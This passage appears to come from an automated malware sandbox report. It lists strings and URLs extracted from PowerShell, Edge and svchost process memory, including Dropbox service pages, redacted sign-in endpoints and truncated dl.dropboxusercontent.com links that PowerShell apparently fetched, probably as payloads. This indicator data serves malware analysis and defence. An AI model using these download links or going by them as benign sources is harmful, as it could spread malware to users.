                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docsend.com/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://experience.dropbox.com/
                      Source: svchost.exe, 00000007.00000003.2255511664.0000020F0F4C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                      Source: svchost.exe, 00000007.00000003.2255511664.0000020F0F450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97C07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA98E4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA98715000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201114FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: msedge.exe, 00000006.00000002.2329082219.0000288402594000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2421849654.00001D5400300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.dropbox.com/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/
                      Source: msedge.exe, 00000006.00000002.2329082219.0000288402594000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2421849654.00001D5400300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                      Source: msedge.exe, 00000006.00000002.2329082219.0000288402594000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2421849654.00001D5400300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                      Source: msedge.exe, 00000015.00000002.2421849654.00001D5400300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/Y
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://navi.dropbox.jp/
                      Source: powershell.exe, 00000003.00000002.2378546799.000001DAA7A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: msedge.exe, 00000006.00000002.2329082219.0000288402594000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2421849654.00001D5400300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps-df.live.com
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/picker
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pal-test.adyen.com
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
                      Source: msedge.exe, 00000006.00000003.2257027698.0000288402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.2256746212.0000288402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407997521.00001D5400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407823387.00001D5400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                      Source: msedge.exe, 00000006.00000003.2257027698.0000288402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.2256746212.0000288402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407997521.00001D5400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407823387.00001D5400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                      Source: msedge.exe, 00000015.00000003.2407997521.00001D5400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407823387.00001D5400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxAB
                      Source: msedge.exe, 00000006.00000003.2257027698.0000288402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.2256746212.0000288402470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                      Source: msedge.exe, 00000006.00000003.2256746212.0000288402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407997521.00001D5400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407823387.00001D5400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
                      Source: msedge.exe, 00000006.00000003.2257027698.0000288402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.2256746212.0000288402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407997521.00001D5400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407823387.00001D5400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                      Source: msedge.exe, 00000006.00000003.2257027698.0000288402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.2256746212.0000288402470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin(
                      Source: msedge.exe, 00000006.00000003.2257027698.0000288402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.2256746212.0000288402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407997521.00001D5400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407823387.00001D5400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
                      Source: msedge.exe, 00000006.00000003.2257027698.0000288402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.2256746212.0000288402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407997521.00001D5400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407823387.00001D5400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                      Source: msedge.exe, 00000006.00000003.2257027698.0000288402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.2256746212.0000288402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407997521.00001D5400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407823387.00001D5400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
                      Source: msedge.exe, 00000006.00000003.2257027698.0000288402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.2256746212.0000288402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407997521.00001D5400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407823387.00001D5400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                      Source: msedge.exe, 00000015.00000003.2407997521.00001D5400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407823387.00001D5400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multiloginT
                      Source: msedge.exe, 00000006.00000003.2257027698.0000288402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.2256746212.0000288402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407997521.00001D5400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407823387.00001D5400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
                      Source: msedge.exe, 00000006.00000003.2257027698.0000288402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.2256746212.0000288402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407997521.00001D5400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407823387.00001D5400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
                      Source: msedge.exe, 00000006.00000003.2257027698.0000288402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.2256746212.0000288402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407997521.00001D5400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407823387.00001D5400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
                      Source: msedge.exe, 00000006.00000003.2257027698.0000288402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.2256746212.0000288402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407997521.00001D5400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407823387.00001D5400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                      Source: msedge.exe, 00000006.00000003.2257027698.0000288402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.2256746212.0000288402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407997521.00001D5400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407823387.00001D5400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.dropbox.com/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sales.dropboxbusiness.com/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://showcase.dropbox.com/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc023df04e495715c365ca7fbb53.dl.dropboxusercontent.com
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc023df04e495715c365ca7fbb53.dl.dropboxusercontent.com/cd/0/get/CgjJ1hn5AQ9QSDUUYQYY62v9V2E1
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc1b3e73e669a72d85958bcbe13a.dl.dropboxusercontent.com
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc1b3e73e669a72d85958bcbe13a.dl.dropboxusercontent.com/cd/0/get/CghKmixZXXrk_7I-wdqTb6UOa6fF
                      Source: powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc4dbae793261c4ce4dfc5ef2aef.dl.dropboxusercontent.com
                      Source: powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc4dbae793261c4ce4dfc5ef2aef.dl.dropboxusercontent.com/cd/0/get/CgjvtlSAZk_sh5IGhdTnIMo7mcgD
                      Source: powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ucf68a874ab5d88bea64660fe73d.dl.dropboxusercontent.com
